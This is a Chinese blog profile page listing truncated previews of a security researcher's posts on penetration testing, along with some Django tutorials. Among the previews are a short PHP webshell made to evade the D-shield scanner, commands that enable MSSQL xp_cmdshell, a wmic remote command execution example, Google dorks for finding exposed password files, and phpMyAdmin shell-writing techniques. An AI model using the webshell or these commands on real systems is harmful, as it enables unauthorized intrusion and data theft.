「已注销」
码龄14年
求更新 关注
提问 私信
  • 博客:298,522
    社区:7
    298,529
    总访问量
  • 148
    原创
  • 90
    粉丝
  • 159
    关注
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:浙江省
加入CSDN时间: 2012-03-25

个人简介:抓紧 留给自己的时间不多了

博客简介:

https://www.cnblogs.com/zpchcbd/

博客描述:
之后的博客放到博客园了
查看详细资料
个人成就
  • 获得96次点赞
  • 内容获得24次评论
  • 获得451次收藏
  • 代码片获得1,888次分享
创作历程
  • 2篇
    2020年
  • 153篇
    2019年
成就勋章
TA的专栏
  • django
    13篇
  • 正则表达式
    2篇
  • CTF
    9篇
  • python
    41篇
  • 后门技巧
    2篇
  • 渗透技巧
    30篇
  • 工具使用
    10篇
  • PHP
    10篇
  • 代码审计
    7篇
  • powershell
    5篇
  • 漏洞利用
    16篇
  • webshell
    1篇
  • 内网渗透
    7篇
  • 网络知识
    10篇

TA关注的专栏 1

TA关注的收藏夹 0

TA关注的社区 7

TA参与的活动 0

兴趣领域 设置
  • 网络空间安全
    web安全
创作活动更多

AI 镜像开发实战征文活动

随着人工智能技术的飞速发展,AI 镜像开发逐渐成为技术领域的热点之一。Stable Diffusion 3.5 FP8 作为强大的文生图模型,为开发者提供了更高效的图像生成解决方案。为了推动 AI 镜像开发技术的交流与创新,我们特此发起本次征文活动,诚邀广大开发者分享在 Stable Diffusion 3.5 FP8 文生图方向的实战经验和创新应用 本次征文活动鼓励开发者围绕 Stable Diffusion 3.5 FP8 文生图方向,分享以下方面的内容: 1. 技术实践与优化 - Stable Diffusion 3.5 FP8 模型架构解析与优化技巧 - 文生图生成效果的提升方法与技巧 - 模型部署与加速策略,例如使用 Hugging Face、Diffusers 等工具 - 针对特定场景(例如二次元、写实风)的模型微调与定制化开发 2. 应用场景探索 - Stable Diffusion 3.5 FP8 在不同领域的应用案例分享,例如游戏设计、广告创意、艺术创作等 - 利用 Stable Diffusion 3.5 FP8 实现图像编辑、图像修复、图像增强等功能的探索 - 结合其他 AI 技术(例如 NLP、语音识别)构建更强大的应用 3. 创新应用与思考 - 基于 Stable Diffusion 3.5 FP8 的创新应用场景设计 - AI 镜像开发的未来发展方向的思考与展望 - 对 AI 镜像开发伦理、安全等问题的探讨

28人参与 去参加
  • 最近
  • 文章
  • 专栏
  • 代码仓
  • 资源
  • 收藏
  • 关注/订阅/互动
更多
  • 最近

  • 文章

  • 专栏

  • 代码仓

  • 资源

  • 收藏

  • 关注/订阅/互动

  • 社区

  • 帖子

  • 问答

  • 课程

  • 视频

搜索 取消

博客园博客园

博客园博客园
原创
博文更新于 2023.07.04 ·
2291 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Google Hacking学习

对公网的语法:Index of /passwordIndex of / passwd“index?of/” xxx?(mp3、pdf)“Index of /” password.txtinurl:logininurl:php?id=1inurl:baidu.cominurl:phpMyAdmininurl:ewebeditorintitle:后台管理intitle:后台管理 ...
原创
博文更新于 2021.04.21 ·
1369 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

踩点思路

google,fofa,zoomeye搜索页面特征(备案、电话、机构等等)找相关站点。(避免根域搜集不全的情况)wooyun历史漏洞库搜相关业务站点(避免根域搜集不全的情况)找二级域(SubDomainscanner,layer). 相关合作公司以真实IP,旁注(旁站查询),robtex找同网段或C段(webfind/ipscan24)(有些业务没有域名)...
原创
博文更新于 2019.04.08 ·
246 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

一个过D盾的php小马

这里给大家分享一个自己写的过D盾的马<?php class ade{ static $name = 'ceshi'; function __construct($name) { self::$name = $name; @eval(Null.self/**/::$name.Null); }}new ade($_POST[1]);这里主要注意的一点的是$name...
原创
博文更新于 2019.04.29 ·
1742 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

[CVE-2016–3714]-Imagetragick 命令执行漏洞复现

路径:/root/vulhub/imagemagick/imagetragick搭建:docker-compose up -d打开地址:存在三个文件demo.php upload.php vul.jpgvul.jpg是攻击的模板push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg...
原创
博文更新于 2019.08.30 ·
817 阅读 ·
0 点赞 ·
2 评论 ·
0 收藏

mysql联合注入绕过安全狗4.0

环境win2003apachemysqlphp操作http://192.168.1.131/Less-1/index.php?id=1 数值型注入首先判断是否存在注入点这里使用的是科学记数法 简单粗暴http://192.168.1.131/Less-1/index.php?id=1e0 不变http://192.168.1.131/Less-1/index.php?id=1...
原创
博文更新于 2019.05.29 ·
1936 阅读 ·
5 点赞 ·
4 评论 ·
12 收藏

django 页面重定向实现的方法

自己现在已知在django中封装好的就只有两种方法1、 导入类from django.http import HttpResponseRedirect用法:return HttpResponseRedirect('/index')2、 导入函数from django.shortcuts import redirect用法:return redirect('/index')这个redi...
原创
博文更新于 2019.09.29 ·
893 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

基于tp3的sql注入漏洞的复现

1.field注入<?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller { public function fieldsql(){ $table_name = I('GET.id') ? I('GET.id') : 1; ...
原创
博文更新于 2019.06.16 ·
2603 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

总结下写phpmyadmin写shell的方法

导出WebShell主要条件:1.Root数据库用户(root权限)2.网站绝对路径(确定有写入权限)3.magic_quotes_gpc:Off(关闭)导出WebShell其它条件:1.magic_quotes_gpc:开启时,会对’单引号进行转义,使其变成“\”反斜杠。2.secure_file_priv:此配置项用来完成对数据导入导出的限制,如允许导入导出到指定目录。3.fil...
原创
博文更新于 2019.09.10 ·
5986 阅读 ·
2 点赞 ·
0 评论 ·
10 收藏

虚拟主机的提权两个小技巧

从别人那里看到了 对虚拟主机的提权很有帮助 就收藏了0x01:是否大家会想到调用远程路径去执行CMD,比如(\x.x.x.x\test\cmd.exe),经过我的测试是可以成功的,而且就算你EXP不免杀,杀软也不会提示!当时记得我有个T00LS的朋友找提权,也是这种情况,当时帮他解决了。调用远程路径的时候要注意一下几点:1:找一台自己的VPS或者打下来的肉鸡,自己的机器需要开启445端口,激活...
转载
博文更新于 2019.06.17 ·
905 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

LCX工具的使用

原由:今天老大要我们复现lcx的端口转发工具:lcx目的:登陆192.168.1.130的3389服务受害者内网的主机(无法出网):192.168.1.130内网ip受害者内网的主机(跳板):192.168.1.131内网ip攻击者的主机:192.168.2.130内网ip攻击者的外网服务器:120.79.66.571、通过受害者的主机的web服务拿到了服务器的shell权限2...
原创
博文更新于 2020.05.10 ·
9886 阅读 ·
2 点赞 ·
2 评论 ·
3 收藏

Windows远程执行cmd命令的方法

觉得对自己有用 于是就记录下来了WMI执行命令(普通权限可以进行hash传递):无回显执行:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>c:\result.txt"利用wmiexec工具配合进行反弹半交互shell:cscript.e...
原创
博文更新于 2020.04.15 ·
39896 阅读 ·
7 点赞 ·
0 评论 ·
36 收藏

MSSQL的提权

MSSQL的提权:1、sql2005版本以后默认为关闭状态,需要开启命令执行开启xp_cmdshell;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;注入点不支持多执行的话,需要一句一句的运行;exec sp_configur...
原创
博文更新于 2019.10.19 ·
597 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

XML所引起的xss攻击

利用条件:1、满足同源策略test.jpg<?xml version="1.0" encoding="iso-8859-1"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><ht...
原创
博文更新于 2019.10.15 ·
5171 阅读 ·
0 点赞 ·
1 评论 ·
5 收藏

XXE漏洞利用

英文全名即 Xml External Entity Injection, 即我们所说的 xml 外部实体注入攻击。实体可以通过预定义在文档中被调用,而实体的标识符又可以访问本地或者远程内容,当允许引用外部实体时,攻击者便可以构造恶意内容来达到攻击。XML:xml 是一种可扩展的标记语言,主要就是用来传输数据的,你可以理解为就是一种写法类似于 html 语言的数据格式文档。但是 xml 跟...
原创
博文更新于 2019.10.14 ·
516 阅读 ·
0 点赞 ·
1 评论 ·
1 收藏

UEditor 1.4.3.3的SSRF漏洞

产生漏洞的代码片段: ueditor\php\Uploader.class.phpprivate function saveRemote(){ $imgUrl = htmlspecialchars($this->fileField); $imgUrl = str_replace("&amp;", "&", $imgUrl); //http开头验证...
原创
博文更新于 2019.10.12 ·
5934 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

SSI指令利用

shtml的作用很多 这里就讲能够包含文件当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为:<!--#include file="conn.asp"-->直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!原来就是如上所说的,<!--#inclu...
原创
博文更新于 2019.10.11 ·
697 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

django 静态文件的设置引入

1、工程目录的文件夹创建:(1-day) C:\Users\dell\Desktop\ALL\python\django\test3>tree卷 OS 的文件夹 PATH 列表卷序列号为 6AEE-CCADC:.├─.idea├─booktest│ ├─migrations│ │ └─__pycache__│ └─__pycache__├─static│ ├─...
原创
博文更新于 2019.10.08 ·
357 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

django上传图片功能

1、实现后台管理页面上传功能2、实现自定义上传文件功能后台管理页面上传功能1、新建模型类class PicTest(models.Model): goods_pic = models.ImageField(upload_to='booktest')2、创建相应的保存文件夹settings.py目录中创建文件夹,用于存储上传文件,并且在static目录下创建一个media的...
原创
博文更新于 2019.10.05 ·
1204 阅读 ·
1 点赞 ·
0 评论 ·
8 收藏

django 中间件

反正感觉有点复杂 硬着头皮吧!!!中间件函数是django框架给我们预留的函数接口,让我们可以干预请求和应答的过程。想要实现的需求:指定某个ip无法访问自己搭建的站点使用request对象的META属性:request.META['REMOTE_ADDR']通过装饰器去实现:Block_ip_lists = ['172.30.212.210']def to_block(func...
原创
博文更新于 2019.10.04 ·
211 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏
加载更多